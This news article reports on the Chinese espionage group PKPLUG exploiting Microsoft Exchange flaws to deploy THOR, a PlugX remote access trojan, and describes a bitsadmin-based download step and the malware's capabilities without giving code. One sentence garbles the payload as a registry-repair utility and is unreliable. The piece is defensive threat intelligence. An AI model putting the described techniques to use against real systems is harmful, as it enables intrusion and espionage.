A Chinese cyberespionage group that previously has targeted Southeast Asian companies exploited the known flaws in Microsoft’s Exchange Server to serve a previously-unknown remote access trojan (RAT).
Palo Alto Networks’ Unit 42 threat intelligence team attributed the intrusions to a threat actor known as PKPLUG (aka Mustang Panda and HoneyMyte). The malware they deploy is a new version of the modular PlugX malware, called Thor.
PlugX is a second-stage, post-exploitation implant that gives attackers the ability to remotely control various features of a compromised PC. It allows keystroke logging, webcam control, file upload, download, and modification, and access to a remote command shell.
“The variant observed […] is unique in that it contains a change to its core source code: the replacement of its trademark word ‘PLUG’ to ‘THOR,'” Unit 42 researchers Mike Harbison and Alex Hinchliffe noted in a report published on Tuesday.
“The earliest THOR sample uncovered was from August 2019, and it is the earliest known instance of the rebranded code. New features were observed in this variant, including enhanced payload-delivery mechanisms and abuse of trusted binaries.”
Hafnium, which is a China-based group, was the first APT to have exploited the zero-day bugs (ProxyLogon) in Exchange to expose sensitive data from select targets. Other threats actors later also started to exploit the flaws.
Now PKPLUG joins this list. The actor was observed bypassing anti-virus protocols to target Microsoft Exchange servers.
“The attackers then used a technique known as “living off the land,” which uses trusted binaries to bypass antivirus detection. In this case, the Microsoft Windows binary bitsadmin.exe was used to download an innocuous file named Aro.dat (SHA256: 59BA902871E98934C054649CA582E2A01707998ACC78B2570FEF43DBD10F7B6F) from an actor-controlled GitHub repo to the target.”
The file contains a clean and optimized version of the plugX payload, which is a utility that is used to fix issues in the Windows Registry. The latest version of the plug-in features a variety of tools that allow attackers to monitor and interact with a compromised system.
The links between the THOR and PKPLUG include the command-and-control infrastructure and overlaps in the malicious behaviors.
Additional details of the attack can be found in the original write-up. Unit 42 has also provided a Python script that can decrypt and encrypt plugX payloads.